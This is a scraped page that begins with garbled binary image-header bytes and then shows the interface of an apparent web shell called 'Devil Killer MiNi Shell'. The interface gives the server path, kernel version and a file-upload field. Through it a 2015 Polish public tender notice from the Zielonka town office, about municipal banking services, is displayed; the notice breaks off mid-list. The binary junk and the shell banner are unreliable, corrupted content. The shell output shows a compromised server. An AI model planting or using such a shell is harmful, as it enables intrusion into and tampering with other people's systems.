JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151204/330770-N-2015.html

<p class="kh_header"><b>Zielonka: Obsługa bankowa budżetu Miasta Zielonka oraz jednostek organizacyjnych</b><br>
<b>Numer ogłoszenia: 330770 - 2015; data zamieszczenia: 04.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Zielonka , ul. Lipowa 5, 05-220 Zielonka, woj. mazowieckie, tel. 22 7613913, faks 22 7819989.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.zielonka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa bankowa budżetu Miasta Zielonka oraz jednostek organizacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obsługa bankowa budżetu Miasta Zielonka oraz jednostek organizacyjnych Miasta, polegająca w szczególności na:
1) otwarciu i prowadzeniu rachunków bieżących i rachunków pomocniczych
2) przyjmowaniu wpłat gotówkowych
3) dokonywaniu wypłat gotówkowych
4) realizacji poleceń przelewu
5) wykonywaniu czynności związanych z obsługą masowych płatności
   (System Indywidualnych Rachunków Kontrahenckich)
6) sporządzaniu wyciągów z rachunku z ustaleniem salda
7) dokonywaniu innych czynności związanych z prowadzoną obsługą bankową wynikających z przepisów prawa bankowego
W ramach umowy Wykonawca powinien umożliwić uruchomienie kredytu w rachunku bieżącym oraz dostęp wszystkich jednostek do systemu bankowości internetowej.
2.	Jednostki objęte obsługą bankową - 
1)	Miasto ZIELONKA
2)	oraz jednostki organizacyjne Miasta:
a)   Ośrodek Pomocy Społecznej
b)   Szkoła Podstawowa nr 1 w Zielonce
c)   Szkoła Podstawowa nr 2 w Zielonce
d)   Szkoła Podstawowa nr 3 w Zielonce 
e)   Miejskie Gimnazjum w Zielonce
f)   Przedszkole nr 3 w Zielonce
g)   Przedszkole nr 4 w Zielonce
h)   Przedszkole nr 5 w Zielonce
i) Zespół Ekonomiczno-Administracyjny Szkół w Zielonce

3. Pod nazwą Zamawiający w niniejszej SIWZ uważa się wszystkie ww. jednostki.
Zamawiający zastrzega, że liczba jednostek organizacyjnych Miasta może ulec zmianie. Nowe bądź przekształcone jednostki będą miały prawo zawrzeć umowę z bankiem na warunkach wynikających z niniejszego postępowania.

Szczegółowy opis przedmiotu zamówienia:

1. Otwieranie, prowadzenie i likwidacja rachunków bieżących i pomocniczych Zamawiającego.

Na początku trwania usługi Wykonawca na zlecenie Zamawiającego otworzy ok. 40 rachunków bieżących i pomocniczych, oprocentowanych stawką WIBID 1M z uwzględnieniem stałego współczynnika korygującego (jednakowego w całym okresie trwania usługi) określonego w złożonej ofercie.
Dodatkowo w trakcie trwania obsługi bankowej Wykonawca na każdy pisemny wniosek zamawiającego otworzy nowy lub zlikwiduje wskazany rachunek bankowy.
Otwieranie i likwidacja rachunków bankowych następować będzie bez opłat i prowizji.

2. System bankowości elektronicznej.
1)	Wykonawca zapewni  dostęp do systemu bankowości elektronicznej - internetowej, (bez konieczności instalacji systemu) spełniający następujące wymogi:
24 godz. dostęp do usługi za pomocą łącza internetowego,
-    autoryzacja transakcji opierać się będzie na jednorazowych kodach w formie karty  chip 	i czytnika lub innych urządzeń do składania bezpiecznych podpisów 	elektronicznych, w które wykonawca zaopatrzy Zamawiającego,
udostępnienie narzędzi do autoryzacji  każdemu uprawnionemu użytkownikowi,
ustanowienia Skarbnika Miasta administratorem systemu, w ramach którego będzie posiadać prawo samodzielnego zarządzania uprawnieniami użytkowników, 
system winien spełniać wysokie standardy bezpieczeństwa zapewniające ochronę przed dostępem osób nieupoważnionych,
system musi funkcjonować sprawnie i działać przynajmniej na dwóch przeglądarkach internetowych,
korzystanie z międzybankowego elektronicznego systemu przelewów środków pieniężnych - co najmniej 3 sesje połączeniowe w ciągu dnia roboczego, 
w przypadku awarii systemu lub braku łączności z winy Wykonawcy, bank bez dodatkowych opłat będzie przyjmował i realizował zlecenia płatnicze składane na zewnętrznych nośnikach danych lub w formie papierowej, oraz zapewni wyciągi bankowe w formie papierowej na prośbę Zamawiającego,
możliwość wykonywania przelewów pojedynczych oraz masowych,
możliwość funkcjonowania rachunku płacowego w powiązaniu z rachunkiem bieżącym,
możliwość definiowania stałych odbiorców,
zapewnienie zachowania lub przeniesienia dotychczasowej listy zdefiniowanych odbiorców do systemu Wykonawcy,
dostęp on-line do aktualnych informacji finansowych Miasta,
uzyskiwanie w czasie rzeczywistym wiadomości o wszystkich operacjach i saldach na rachunkach bieżących i pomocniczych zarówno Zamawiającego jak i jego jednostek organizacyjnych,
wyszukiwanie i selekcja operacji wg wybranych kryteriów,
określanie czasu bezczynności w formie licznika (zegara),
możliwość pobierania raportów plikowych,
przesyłanie wielu przelewów w formie paczki,
generowanie elektronicznych wyciągów bankowych w dowolnym zakresie czasowym z możliwością ich zapisywania i drukowania,
Wykonawca zapewni Zamawiającemu za pośrednictwem systemu elektronicznego bierny podgląd wszystkich rachunków bankowych jednostek organizacyjnych Zamawiającego (w tym historię rachunków), dodatkowo musi zapewnić możliwość połączenia i prezentacji na jednym ekranie rachunków wszystkich jednostek organizacyjnych Zamawiającego w celu zapewnienia sprawnego monitorowania środków na rachunkach podległych jednostek z poziomu Zamawiającego,
przechowywanie historii wszystkich operacji w archiwum systemu.	
2. Realizacja przelewów:
Realizacja poleceń przelewów w formie elektronicznej, sporadycznie papierowej.
Przelewy pomiędzy rachunkami w tym samym banku mają być realizowane w czasie rzeczywistym.
Polecenia przelewów zewnętrznych zarejestrowane w systemie bankowym do godz. 15:00 od poniedziałku do piątku winny być księgowane na rachunku Zamawiającego i wysłane do banku odbiorcy w tym samym dniu, a zarejestrowane po godz. 15:00 oraz w soboty nie później niż w następnym dniu roboczym I sesją ELIXIR.
Zlecanie przelewów za pośrednictwem systemu  SORBNET.
Polecenia przelewów w formie papierowej będą składane przez Zamawiającego i jego jednostki w wyjątkowych sytuacjach. 
Import przelewów przygotowanych w systemie finansow-księgowym Zamawiającego do systemu bankowego wg formatu wynikającego z systemu finansowo-ksiegowego, Miasto Zielonka korzysta z systemu KSIĘGOWOŚĆ BUDŻETOWA - firmy U.I. INFO-SYSTEM  oraz z systemu VULCAN.
Przechowywanie historii operacji na wszystkich rachunkach Zamawiającego w archiwum systemu co najmniej przez okres trwania umowy.
Po zakończeniu realizacji umowy Wykonawca zobowiązany będzie przekazać w terminie 15 dni bazę danych z archiwum operacji na rachunkach oraz słowniki z danymi wprowadzonymi przez Zamawiającego w formacie uzgodnionym z Zamawiającym.

3. System wirtualnych rachunków kontrahenckich :
założenie i prowadzenie w systemie wirtualnych rachunków kontrahenckich rachunków bankowych służących obsłudze płatności masowych z tytułu podatków i opłat pobieranych przez Miasto,
system wirtualnych rachunków kontrahenckich umożliwi identyfikacje danych kontrahenta poprzez umieszczenie indywidualnych oznaczeń w numerze rachunku (kodu identyfikacyjnego) przypisanemu indywidualnie każdemu kontrahentowi/dłużnikowi,
kod identyfikacyjny będzie składał się z 12 cyfr,
płatności dokonywane przez kontrahenta/dłużnika będą księgowane na wskazanym rachunku przez Zamawiającego,
z operacji zarejestrowanych na rachunku, Zamawiający otrzymywać będzie informacje w formie elektronicznej w postaci pliku wynikowego, który będzie zawierał szczegółowe dane w strukturze opartej na format uzgodniony i zaakceptowany przez Zamawiającego,
obecny program księgowy Urzędu Miasta Zielonka jest produkcji  firmy U.I. INFO-SYSTEM ROMAN I TADEUSZ GROSZEK SP.J.,
za świadczone usługi nie będą pobierane opłaty.

4. Obsługa bankowa:
1)	Prowadzenie rachunków bankowych  - aktualnie 40 rachunków,
2)	Przyjmowanie wpłat gotówkowych dokonywanych przez zamawiającego w formie otwartej w oddziałach banku  - szacunkowo  220 szt. wpłat rocznie o łącznej wartości  500 000 zł.
3)	Przyjmowanie wpłat gotówkowych w oddziałach banku dokonywanych przez osoby fizyczne na rachunki zamawiającego  - szacunkowo 1 100 wpłat o łącznej wartości 
 800 000 zł.
4)	Dokonywanie wypłat gotówkowych w formie otwartej - szacunkowo 50 szt. rocznie 
o łącznej wartości 1 000 000 zł.
5)	Dokonywanie masowych wypłat gotówkowych zleceń płatniczych zlecanych w postaci pliku przez Zamawiającego , na rzecz wskazanych przez niego odbiorców ( w szczególności dla klientów Miejskiego Ośrodka Pomocy Społecznej).
6)	Realizacja przelewów  składanych w formie papierowej  na rachunki  prowadzone 
w banku obsługującym  - szacunkowo 20 szt. rocznie.
7)	Realizacja przelewów składanych w formie papierowej na rachunki prowadzone 
w innych bankach - szacunkowo 50 szt. rocznie.
8)	Realizacja przelewów składanych za pośrednictwem serwisu internetowego na rachunki prowadzone w banku obsługującym  - szacunkowo 5 000 szt.
9)	Realizacja przelewów składanych za pośrednictwem serwisu internetowego na rachunki prowadzone w innych bankach  - szacunkowo 20.000 szt.
10)	Wykonywanie  czynności związanych z obsługą masowych płatności - system wirtualnych rachunków kontrahenckich.
11)	Miesięczna opłata za korzystanie z serwisu internetowego.
12)	Wyciągi bankowe przekazywane w formie pliku elektronicznego.
13)	Przekazywanie kopii i wtórników dowodów źródłowych - na żądanie.
14)	Wydawanie zaświadczeń ( np. potwierdzenie prowadzenia rachunku bankowego, wydawanie potwierdzenia operacji bankowej),
15)	Wydawanie wydruku historii rachunku za okres poprzedzający bieżący miesiąc.
16)	
 Zerowanie  rachunków podstawowych i pomocniczych - przelew z rachunku na wskazany numer rachunku konta budżetu.
17)	Opłata za przeksięgowanie skapitalizowanych odsetek od środków na rachunkach bankowych.
18)	Wydawanie blankietów czeków, bez opłat i prowizji.

5. Kredyt w rachunku bieżącym:
1)	Udzielenie w rachunku bieżącym budżetu Miasta kredytu odnawialnego na pokrycie występującego w ciągu roku przejściowego deficytu budżetowego, do wysokości określonej w każdym roku przez Radę Miasta  w uchwale budżetowej. W projekcie uchwały budżetowej na rok 2016 kwota kredytu na finansowanie przejściowego deficytu budżetu wynosi 5.000.000 PLN.
2)	Kredyt dostępny będzie przez cały czas trwania kilkuletniej umowy zawartej z Bankiem na obsługę budżetu. Środki będą udostępniane na pisemną dyspozycję Zamawiającego w związku z podejmowanymi uchwałami budżetowymi do wysokości zapisanej w uchwale na dany rok budżetowy.
3)	Zabezpieczenie kredytu weksel in blanco z wystawienia kredytobiorcy wraz 
z deklaracją wekslową. Zamawiający nie przewiduje składania oświadczeń o poddaniu się egzekucji. 
4)	Odsetki od wykorzystanego kredytu naliczane będą w miesięcznych okresach obrachunkowych. 
5)	Oprocentowanie  kredytu będzie liczone jako suma stawki WIBOR 1M z dnia rozpoczęcia każdego okresu obrachunkowego oraz określonej w ofercie stałej (jednakowej w całym okresie trwania umowy) marży banku. 
6)	Termin spłaty kredytu - do 31 grudnia każdego roku. Każdy wpływ na rachunek bieżący będzie powodował zmniejszenie salda kredytu. 
7)	Wykonawca nie będzie pobierał żadnych dodatkowych opłat z tytułu gotowości, 
a oprocentowanie będzie liczone wyłącznie od faktycznie wykorzystanej kwoty kredytu. 
8)	Uruchomienie kredytu w rachunku bieżącym powinno nastąpić bez opłat i prowizji.

6.  Oprocentowanie środków na rachunkach bankowych, lokaty:
1)	Naliczanie i kapitalizacja odsetek od środków na rachunkach bankowych będzie następować ostatniego dnia miesiąca, bez opłat i prowizji. 
2)	Wysokość oprocentowania środków na rachunkach bankowych wyznaczona będzie każdego miesiąca jako iloczyn wysokości stawki WIBID 1M z dnia poprzedzającego dzień naliczania odsetek oraz współczynnika korygującego (jednakowego w całym okresie trwania umowy), określonego w ofercie złożonej przez  Wykonawcę.
3)	Możliwość zakładania lokat overnight (O/N). 
4)	Zawieranie lokat negocjowanych od 1 dnia do 1 roku za pośrednictwem bankowości elektronicznej.

7. Pozostałe :

1)	Dostarczanie zamawiającemu (w celu użytkowania w trakcie umowy) narzędzia lub usługi, umożliwiającego wyliczanie odsetek od zwracanych depozytów (wadiów, zabezpieczeń należytego wykonania umowy). Przykładowo 	oferowanym narzędziem może być: kalkulator on-line, aktualizowany arkusz kalkulacyjny, informacja przesyłana z banku z załączonym  wyliczeniem itp., bez opłat i prowizji.
2)	Wykonawca posiada lub otworzy w ciągu 2 miesięcy od dnia podpisania umowy na terenie miasta Zielonka placówkę banku (filię, oddział).
3)	Aneksowanie umów bez opłat i prowizji.
4)	Dewizowe polecenia wypłaty (DPW) przychodzące i wychodzące, bez opłat i prowizji. 
5)	Komunikaty SWIFT bez opłat i prowizji.
6)	Zamawiający nie dopuszcza pobierania opłat za zmianę kart wzorów podpisów. 
7)	Koszty obsługi bankowej będą ponosiły jednostki organizacyjne samodzielnie.
8)	Wyznaczenie osoby lub osób pełniących funkcje opiekuna bankowego Miasta Zielonka..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4, 66.11.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeśli wykonawca wykaże, że:
posiada zezwolenie na prowadzenie działalności bankowej na terenie Rzeczypospolitej Polskiej zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. Prawo Bankowe (t.j. Dz.U. z 2015r., poz. 128), a w przypadku określonym w art. 178 ust. 1 ustawy Prawo Bankowe inny dokument potwierdzający rozpoczęcie działalności przed dniem wejścia w życie ustawy, o której mowa w art. 193 ustawy Prawo Bankowe</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że:
w tym okresie wykonywał należycie min. pięciu usług bankowych polegających na obsłudze jednostek sektora finansów publicznych wraz z podległymi jednostkami, które posiadają samodzielność finansową przynajmniej 8 jednostek, w tym jedną usługę bankową prowadzenia w systemie wirtualnych rachunków bankowych służących obsłudze płatności masowych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia 
(wzór zał. Nr 3).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia 
(wzór zał. Nr 3).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia 
(wzór zał. Nr 3).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 65</li>
<li>2 - Cena (koszt) udzielenia kredytu - 10</li>
<li>3 - oprocentowanie lokat - overnight - 10</li>
<li>4 - oprocentowanie środków pieniężnych płatnych na żądanie, gromadzonych na rachunkach bankowych - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	Wszelkie zmiany umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach unormowania art. 144 ustawy Prawo zamówień publicznych.
2)	Zmiana postanowień umowy w zakresie odnoszącym się do ceny, terminu i sposobu realizacji jest dopuszczalna tyko w przypadku: 
a)	zaistnienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie  z jej postanowieniami lub obowiązującymi przepisami prawa;
b)	zmian wysokości wynagrodzenia należnego wykonawcy, w przypadku zmiany:
stawki podatku od towarów i usług
wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, 
zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne 
